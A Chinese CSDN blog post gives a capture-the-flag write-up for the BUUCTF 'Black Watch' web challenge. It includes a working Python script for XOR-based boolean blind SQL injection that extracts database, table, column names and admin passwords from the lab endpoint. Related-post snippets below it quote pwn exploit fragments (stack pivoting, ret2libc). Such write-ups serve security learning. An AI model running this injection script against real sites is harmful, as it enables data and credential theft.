[Black Watch 入群题]Web

最新推荐文章于 2021-08-17 15:00:09 发布
最新推荐文章于 2021-08-17 15:00:09 发布
阅读量1.7k 收藏
点赞数 1
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/106413112
版权

在这里插入图片描述
登录抓包
在这里插入图片描述
这是一段以json传入的数据,起初对着这个一直想json注入,然后发现怎样注入都行不通
回到热点列表
在这里插入图片描述
发现更改后面的数字会变,谷歌浏览器f12 network

在这里插入图片描述

在这里插入图片描述
发现有个php文件,进去
在这里插入图片描述
数据存放在这里了,输入双引号的时候发现弹出这个
在这里插入图片描述
sql注入无疑了
刚开始的id是1,由此推断可能是整形注入
但是联合查询,报错都没用
bp测试看他究竟过滤了啥

在这里插入图片描述
啥都没过滤
在这里插入图片描述
卡了挺久的,翻了翻自己博客
极客大挑战finalsql
异或布尔盲注
这题有个坑,他返回的是json的格式,我们进行json转换后,还得将它转为字符窜,才能正确找到

import requests

flag=''
#查库名
payload1 = '1^(ascii(substr((select(database())),{},1))>{})^1'    #库名为news

#查表名
payload2 = '1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=\'news\')),{},1))>{})^1' #表名为admin,contents

#查字段
payload3 = '1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=\'contents\')),{},1))>{})^1'   #admin表里有id,username,password,is_enable
                                                                                                                                              # contents表里有id,title,content,is_enable

#查字段值
payload4 = '1^(ascii(substr((select(group_concat(password))from(admin)),{},1))>{})^1'



for i in range(1,100):
    low =28
    high =137
    mid = (low + high) // 2

    while(low < high):
        url = 'http://4131c114-1800-4626-9601-5d7928856dd7.node3.buuoj.cn/backend/content_detail.php?id='
        payload = payload4.format(i,mid)
        url+=payload
        print(url)
        r = requests.get(url)
        text = str(r.json())

        if "札师傅缺个女朋友" in text:
            low = mid + 1
        else:
            high = mid

        mid = (low + high) // 2

    if(chr(mid)==''):
        break
    flag +=chr(mid)
    print(flag)

print(flag)

跑出来两组用户名和密码,输入第二组即可得到flag

penson by 小乌
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Black Belt ACI Deployment - Stage1
07-02
Black Belt ACI Deployment - Stage1 是思科在2019年6月推出的一项高级合作伙伴认证考试,旨在验证网络专业人士在部署Cisco Application Centric Infrastructure(ACI)解决方案方面的能力。ACI是思科的一种创新网络...
Black Belt Collaboration Deployment - Stage1
07-02
Black Belt Collaboration Deployment - Stage1是思科在2019年6月推出的一项高级认证考试,旨在测试和验证专业人士在协作部署领域的专业知识和技术能力。这个库是为那些准备参加这项认证考试的考生提供的重要参考...
BUUCTF--[Black Watch ]Web
qq_46263951的博客
07-24 946
登录时使用burp suite抓包发现是以json传的数据 进去之后我们发现单击这三个热点分别会有以下三种响应 因为id=1,所以这里是一个整形注这里使用的异或盲注
[Black Watch ]PWN
、moddemod
06-20 358
利用bss进行栈迁移 exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './spwn' p = process(proc_name) # p = remote('node3.buuoj.cn', 29482) elf = ELF(proc_name) write_plt = elf.plt['wri.
BUUCTF-[Black Watch ]PWN
Fzuim的博客
04-14 373
常规检查下来,发现可以进行栈溢出,但是允许操作的空间只有8个字节… 看下ida伪代码 可操作空间很小,只能覆盖到eip,正常思路是:泄露write的got表地址,然后通过libcsearch找出system和bin/sh的地址,再次构造栈溢出攻击。此目栈溢出只能操作8字节,一般思路行不通。此时就用到另一个概念:栈迁移!!! 栈迁移的关键点在于esp,能把esp重新指向另外一块内存空间,即可成功。这的另一块内存空间就是bss段。 利用到栈迁移,我们需要在原本栈的eip位置覆盖成 leave;r.
Black Belt HyperFlex Deployment - Stage1
07-02
Black Belt HyperFlex Deployment - Stage1 是思科在2019年6月为合作伙伴推出的一项高级认证考试。这个库是针对那些希望深理解和熟练掌握HyperFlex解决方案部署的专业人士所设计的。HyperFlex是思科的一种超融合...
oracle OS watch black box
12-04
oracle OS watch black box,监控CPU,MEMORY,IO使用情况的免费工具,Oracle官方提供
Blackjack-Simulator:一个用React编写的基于Web的简单Blackjack模拟器
05-03
:spade_suit: 大酒杯模拟器 :spade_suit: 基于React的轻量级基于Web的二十一点游戏 :party_popper: 实时游戏统计数据。 学习,练习和掌握二十一点的完美工具。准备玩? :partying_face: 特征真正的扑克卡随机生成的...
http,ftp,mail服务器架设为一体软件
05-28
首先,我们先来了解一下花生壳的到底有什么作用。因为ADSL每次拨号上网所获得的IP地址每次都是不同的,花生壳起到的作用就是方便用户访问我们的服务 器(只需要输域名便可),而不用每次都输IP地址那么麻烦(因为我们也不可能每次重新拨号上网后,又去告诉用户现在的服务器的IP地址什么)。<br><br>例如,我们的花生壳护照下有一个域名www.oray.net ,那么只要在电脑上用该护照登陆了花生壳客户端。当别人输www.oray.net的时候,会自动解析到那台电脑所在的网络的公网IP地址。<br><br>也就是说,具体的服务器,是要我们自己去设置完成的。而不同的上网方式,建立服务器的方式是不同的,下面介绍两种常见上网方法的服务器的建立。(这两个上网方法主要区别在于用来做服务器的计算机,能否得到公网的IP地址)。<br>
buuctf [Black Watch ]PWN
qq_42728977的博客
04-10 637
本来想着栈溢出简简单单,然后发现竟然没见过这知识点,堆迁移。 看雪链接
栈迁移学习(buuctf [Black Watch ])
像初雪一样自由洒落
03-14 982
i春秋的borrowstack是栈迁移和万能gadget的混合,,,然后writeup看的不是很明白,也没有很细的解析,所以,emmm,应该是自己栈迁移学的不是很好,只是知道大概的意思,但是还没有做过,这次在看雪看到文章,就好好学一下,做到啦!! 栈迁移,我觉得比较好理解,如果试过将调用一个函数过程好好自己试过的话,知道控制ebp,可以控制函数的去向,详细可以看看这篇图示:https://b...
[Black Watch ]PWN(栈迁移)
qq_39869547的博客
02-06 947
栈迁移主要解决溢出空间不足的问, 前提条件知道欲迁移位置的地址。 from LibcSearcher import * from PwnContext.core import * binary = './spwn' debug_libc = './libc-2.23.so' elf = ELF(binary) libc = ELF(debug_libc) local = 1 if local ...
【BUUCTF】[Black Watch ]PWN
m0_51251108的博客
12-27 388
【BUUCTF】[Black Watch ]PWN 记录下刷,方便自己以后回顾,写的很烂,还请见谅 本要用栈迁移 先checksec,file和nc看下程序 32位,动态链接,无canary和pie 思路:vul_function()里最后的read能栈溢出,但位置太短,不够写rop,运用栈迁移跳转至跳转至上一个read,写rop链,ret2libc后就能拿到shell了 主要是如何栈迁移: leave ret相当于: leave => mov esp, ebp; pop ebp
[BUUCTF-pwn]——[Black Watch ]PWN
Y_peak的博客
02-21 228
[BUUCTF-pwn]——[Black Watch ]PWN 目地址: https://buuoj.cn/challenges#[Black Watch ]PWN 思路 由于可以利用的溢出空间不够, 利用给定的bss段, 利用栈劫持到bss段。进行操作。 下面的 -4操作是因为会有一个pop ebp的指令执行, 执行过后。会 +4 exploit from pwn import * from LibcSearcher import * elf = ELF("./spwn") p =
[Black Watch ]PWN(栈迁移到bss)
qq_33590156的博客
08-04 706
from pwn import * from LibcSearcher import * context(os='linux',arch='i386',log_level='debug') ms = remote('node3.buuoj.cn',25353) #ms = process("./spwn") elf = ELF('./spwn') bss_addr = 0x0804A300 lea_ret = 0x08048408 write_plt = elf.plt['write'] write_
[Black Watch ]PWN 栈劫持的利用
半岛铁盒的博客
08-17 328
32位程序,开启了nx保护 没有system函数和‘/bin/sh’的字符串,这边需要我们自己去想办法构造system(‘/bin/sh’) 思路 第一次输的参数s,那边我们可以写很长的数据,我们可以将我们的rop链布置在那里, 接着执行第二次输,利用站劫持,把程序的执行流程劫持到第一次输的位置就可以了 站劫持利用 做栈劫持主要用到的是一个leave;ret指令,一般程序执行完成后都会调用leave;ret来还原现场 payload1=‘a’*0x18+p32(s-4)+p32(leave_r
doudoudedi
01-29 728
不好讲就是 exp: #! /usr/bin/python2 from pwn import * from LibcSearcher import * local=0 if local==1: p=process('../binary/spwn') elf=ELF('../binary/spwn') libc=elf.libc else: p=remote('node3.buuoj....
程序设计基础复习.docx
05-11
C++程序设计期末复习

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值